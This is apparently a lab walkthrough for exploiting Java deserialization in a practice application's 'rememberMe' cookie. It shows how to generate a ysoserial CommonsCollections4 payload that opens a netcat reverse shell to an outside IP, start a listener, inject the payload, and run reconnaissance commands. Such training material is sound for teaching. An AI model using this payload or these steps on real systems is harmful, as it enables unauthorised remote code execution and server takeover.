Step 1: Click on "Java Website: 16661" link.
Step 2: Provide the following credential and tick the "Remember Me" option and click on Submit button.
Username: admin
Password: password
Note: The registration functionality is disabled for this application.
Step 3: Capture the HTTP request and send this request to repeater "Right Click -> Send to Repeater".
Step 4: Click on "send" button and observe that the server responds with "rememberMe" cookie which has Java serialized magic string starting with "rO0".
Step 5: Observe the serialized value of it after decoding it with Base64.
Step 6: Forward the request captured in Step 3 and click on "Login" button.
Step 7: Download the YSoSerial utility from following location, and use the following command to check the payloads available.
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
java -jar ysoserial-master-SNAPSHOT.jar
Step 8: Capture the IP address and use that to generate the reverse shell payload using following command and capture the generated payload.
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "nc 192.168.29.88 4444 -e /bin/bash" | base64 -w 0
Step 9: Start the listener using following command.
nc -nlvp 4444
Step 10: Replace the payload generated in Step 8 in the "RememberMe" parameter and click on "send" button to send request to the server.
Step 11: A connection will be received on reverse shell. Extract the system information using whoami, uname -a command.


